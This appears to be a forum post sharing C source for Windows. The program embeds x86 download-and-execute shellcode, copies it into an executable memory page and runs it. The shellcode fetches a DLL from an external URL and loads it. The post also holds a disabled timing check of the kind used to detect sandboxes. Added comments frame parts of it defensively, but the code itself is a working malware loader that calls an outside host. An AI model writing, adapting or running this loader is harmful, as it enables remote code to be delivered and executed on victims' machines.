
Source RunPE Source

Тема в разделе "C / C# / C++", создана пользователем hackerpro, 12 ноя 2015.

    #include <Windows.h>
    
    /* Fixed user-mode address at which Windows maps the read-only KUSER_SHARED_DATA
       page; InternalGetTickCount() below casts it to PKUSER_SHARED_DATA. */
    #define MM_SHARED_USER_DATA 0x7FFE0000
    
    /* Type of KUSER_SHARED_DATA.NtProductType. Declared only to reproduce the
       struct layout; nothing in this file reads the field. */
    typedef enum _NT_PRODUCT_TYPE
    {
        NtProductWinNt = 1,
        NtProductLanManNt = 2,
        NtProductServer = 3
    } NT_PRODUCT_TYPE;
    
    /* Type of KUSER_SHARED_DATA.AlternativeArchitecture. Present for layout
       fidelity only; the field is never read here. */
    typedef enum _ALTERNATIVE_ARCHITECTURE_TYPE
    {
        StandardDesign = 0,
        NEC98x86 = 1,
        EndAlternatives = 2
    } ALTERNATIVE_ARCHITECTURE_TYPE;
    
    /* 64-bit time value split into a low dword and two copies of the high dword.
       A reader takes High1Time, then LowPart, and accepts the pair only if
       High2Time still equals High1Time; that is how InternalGetTickCount() detects
       a torn read while the kernel is updating the value. */
    typedef struct _KSYSTEM_TIME
    {
        ULONG LowPart;
        LONG High1Time;   // written first by the updater
        LONG High2Time;   // written last; equal to High1Time once the update is complete
    } KSYSTEM_TIME, *PKSYSTEM_TIME;
    
    /*
     * Local mirror of the KUSER_SHARED_DATA page layout, declared so that
     * InternalGetTickCount() can reach TickCountMultiplier and TickCount through a
     * typed pointer at MM_SHARED_USER_DATA. Every other member exists only to keep
     * those two at the right offsets; none of them is read in this file.
     *
     * Layout caveat: the bitfields following SharedDataFlags are a separate ULONG
     * here, whereas the public ntddk declaration (to my recollection) overlays them
     * on SharedDataFlags inside a union. Because TestRetInstruction is 8-byte
     * aligned, the extra dword lands where alignment padding would otherwise sit,
     * so the offset of TickCount appears to come out the same (0x320 in the public
     * headers, if memory serves) — confirm with offsetof() on the target compiler
     * and bitness before relying on this struct.
     */
    typedef struct _KUSER_SHARED_DATA
    {
        ULONG TickCountLowDeprecated;
        ULONG TickCountMultiplier;   // read by InternalGetTickCount()
        KSYSTEM_TIME InterruptTime;
        KSYSTEM_TIME SystemTime;
        KSYSTEM_TIME TimeZoneBias;
        WORD ImageNumberLow;
        WORD ImageNumberHigh;
        WCHAR NtSystemRoot[260];
        ULONG MaxStackTraceDepth;
        ULONG CryptoExponent;
        ULONG TimeZoneId;
        ULONG LargePageMinimum;
        ULONG Reserved2[7];
        NT_PRODUCT_TYPE NtProductType;
        UCHAR ProductTypeIsValid;
        ULONG NtMajorVersion;
        ULONG NtMinorVersion;
        UCHAR ProcessorFeatures[64];
        ULONG Reserved1;
        ULONG Reserved3;
        ULONG TimeSlip;
        ALTERNATIVE_ARCHITECTURE_TYPE AlternativeArchitecture;
        LARGE_INTEGER SystemExpirationDate;   // 8-byte aligned: implies padding after the enum above
        ULONG SuiteMask;
        UCHAR KdDebuggerEnabled;
        UCHAR NXSupportPolicy;
        ULONG ActiveConsoleId;
        ULONG DismountCount;
        ULONG ComPlusPackage;
        ULONG LastSystemRITEventTickCount;
        ULONG NumberOfPhysicalPages;
        UCHAR SafeBootMode;
        ULONG SharedDataFlags;
        /* Separate dword here rather than a union over SharedDataFlags — see the
           layout caveat in the header comment. */
        ULONG DbgErrorPortPresent : 1;
        ULONG DbgElevationEnabled : 1;
        ULONG DbgVirtEnabled : 1;
        ULONG DbgInstallerDetectEnabled : 1;
        ULONG SystemDllRelocated : 1;
        ULONG SpareBits : 27;
        UINT64 TestRetInstruction;   // 8-byte aligned
        ULONG SystemCall;
        ULONG SystemCallReturn;
        UINT64 SystemCallPad[3];
        /* Anonymous union (MSVC extension / C11). TickCount is the value read by
           InternalGetTickCount(); High1Time/High2Time guard against a torn read. */
        union
        {
            KSYSTEM_TIME TickCount;
            UINT64 TickCountQuad;
        };
        ULONG Cookie;
        INT64 ConsoleSessionForegroundProcessId;
        ULONG Wow64SharedInformation[16];
        WORD UserModeGlobalLogger[8];
        ULONG HeapTracingPid[2];
        ULONG CritSecTracingPid[2];
        ULONG ImageFileExecutionOptions;
        union
        {
            UINT64 AffinityPad;
            ULONG ActiveProcessorAffinity;
        };
        UINT64 InterruptTimeBias;
    } KUSER_SHARED_DATA, *PKUSER_SHARED_DATA;
    
    /*
     * Reads the system tick count straight from the shared user data page instead
     * of calling GetTickCount(). The scaling below — (LowPart * TickCountMultiplier)
     * >> 24 plus (HighPart << 8) * TickCountMultiplier — appears to be the same
     * formula the SDK applies to the shared-page tick count; confirm against the
     * documented GetTickCount() behaviour before treating the two as equivalent.
     * The commented-out block in main() uses it as an independent second clock.
     *
     * Returns: the tick value truncated to a ULONG.
     *
     * NOTE(review): SharedUserData is not declared volatile, so nothing in the
     * language forbids the compiler from hoisting the TickCount reads out of the
     * retry loop or collapsing them into one load; reads of a memory-mapped page
     * that another party updates should go through a volatile pointer.
     */
    ULONG InternalGetTickCount() {
    
        PKUSER_SHARED_DATA SharedUserData = (PKUSER_SHARED_DATA)MM_SHARED_USER_DATA;
    
        ULARGE_INTEGER TickCount;
    
        /* Torn-read guard: capture High1Time, then LowPart, and accept the pair only
           if High2Time still matches High1Time; otherwise the kernel was mid-update
           and we spin and retry. */
        while (TRUE) {
            TickCount.HighPart = (ULONG)SharedUserData->TickCount.High1Time;
            TickCount.LowPart = SharedUserData->TickCount.LowPart;
    
            if (TickCount.HighPart == (ULONG)SharedUserData->TickCount.High2Time)
                break;
    
            YieldProcessor();   // pause hint while spinning
        }
    
        // Low dword scaled by the multiplier; the 64-bit intermediate keeps the product from overflowing.
        ULONG tick1 = ((unsigned __int64)(unsigned int)(TickCount.LowPart)*(unsigned __int64)(unsigned int)(SharedUserData->TickCountMultiplier) >> 24);
        // High dword << 8 times the multiplier; the assignment to ULONG keeps only the low 32 bits.
        ULONG tick2 = ((unsigned __int64)(unsigned int)((TickCount.HighPart << 8) & 0xFFFFFFFF)*(unsigned __int64)(unsigned int)(SharedUserData->TickCountMultiplier));
    
        return tick1 + tick2;
    }
    
    /*
     * Raw payload bytes that main() copies into an executable page and calls: a
     * 32-bit x86 code blob, followed by an inline ASCII URL and a terminating NUL.
     * The link in main() credits the packetstorm "download" shellcode it was taken
     * from. The URL literal at the end is the network indicator a defender would
     * extract from this sample.
     *
     * main() sizes the copy with lstrlenA(), so the blob is only copied in full if
     * it contains no 0x00 byte before the final "\x00".
     */
    unsigned char shellcode[] =
    "\x31\xC9\x64\x8B\x41\x30\x8B\x40\x0C\x8B\x70\x14\xAD\x96\xAD\x8B"
    "\x58\x10\x8B\x53\x3C\x01\xDA\x8B\x52\x78\x01\xDA\x8B\x72\x20\x01"
    "\xDE\x31\xC9\x41\xAD\x01\xD8\x81\x38\x47\x65\x74\x50\x0F\x85\xF0"
    "\xFF\xFF\xFF\x81\x78\x04\x72\x6F\x63\x41\x0F\x85\xE3\xFF\xFF\xFF"
    "\x81\x78\x08\x64\x64\x72\x65\x0F\x85\xD6\xFF\xFF\xFF\x8B\x72\x24"
    "\x01\xDE\x66\x8B\x0C\x4E\x49\x8B\x72\x1C\x01\xDE\x8B\x14\x8E\x01"
    "\xDA\x31\xC9\x51\x68\x2E\x64\x6C\x6C\x68\x64\x65\x61\x64\x53\x52"
    "\x51\x68\x61\x72\x79\x41\x68\x4C\x69\x62\x72\x68\x4C\x6F\x61\x64"
    "\x54\x53\xFF\xD2\x83\xC4\x0C\x59\x50\x89\x45\xFC\x51\x66\xB9\x6C"
    "\x6C\x51\x68\x6F\x6E\x2E\x64\x68\x75\x72\x6C\x6D\x54\xFF\xD0\x83"
    "\xC4\x10\x8B\x54\x24\x04\x31\xC9\x51\x66\xB9\x65\x41\x51\x31\xC9"
    "\x68\x6F\x46\x69\x6C\x68\x6F\x61\x64\x54\x68\x6F\x77\x6E\x6C\x68"
    "\x55\x52\x4C\x44\x54\x50\xFF\xD2\x31\xC9\x8D\x54\x24\x24\x51\x51"
    "\x52\xEB\x1F\x51\xFF\xD0\x83\xC4\x1C\x31\xC0\x50\x68\x2E\x64\x6C"
    "\x6C\x68\x64\x65\x61\x64\x54\x8B\x45\xFC\xFF\xD0\x90\xE9\xFA\xFF"
    "\xFF\xFF\xE8\xDC\xFF\xFF\xFF"
    /* Inline download target appended to the code bytes — the IoC to block/hunt for. */
    "https://rstforums.com/fisiere/dead.dll"
    "\x00";   // terminator that lstrlenA() in main() stops at
    
    /*
     * Entry point: copies the embedded payload into a freshly allocated executable
     * page and transfers control to it.
     *
     * The block commented out at the top is a disabled timing check: it samples
     * both InternalGetTickCount() and GetTickCount() around a Sleep() and returns
     * early when the two deltas disagree — presumably a check that the clocks the
     * process sees have not been tampered with (inferred from the code, not stated
     * by the author).
     *
     * Returns: 0 (or whatever state the payload leaves the process in).
     */
    int main(void) {
    
        /*
        DWORD dwMilliSec = 500;
    
        ULONG InternalTickCountA = InternalGetTickCount();
        ULONG TickCountA = GetTickCount();
    
        Sleep(dwMilliSec); // Replace with code or something
    
        ULONG InternalTickCountB = InternalGetTickCount();
        ULONG TickCountB = GetTickCount();
    
        if (InternalTickCountB - InternalTickCountA != TickCountB - TickCountA)
        {
            return 0;
        }
        */
    
        // https://dl.packetstormsecurity.net/shellcode/downloadload-shellcode.txt
        {
            void(*pfunc)();
            /* One RWX page for the payload. NOTE(review): the return value is not
               checked, so a failed VirtualAlloc() sends memcpy() through NULL; the
               page is also never released. From a detection standpoint, a private
               PAGE_EXECUTE_READWRITE region that is subsequently called into is the
               textbook in-memory loader signature that memory scanners key on. */
            void* lpAlloc = VirtualAlloc(0, 4096, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
            /* lstrlenA() stops at the first NUL, so the copy covers the code bytes,
               the trailing URL string, and (+1) its terminator. No check that this
               fits in the 4096-byte page; it does for the array above. */
            memcpy(lpAlloc, shellcode, lstrlenA((LPCSTR)shellcode) + 1);
            pfunc = (void(*)())lpAlloc;
            pfunc();   // control passes into the copied bytes
        }
    
        return 0;
    }
     
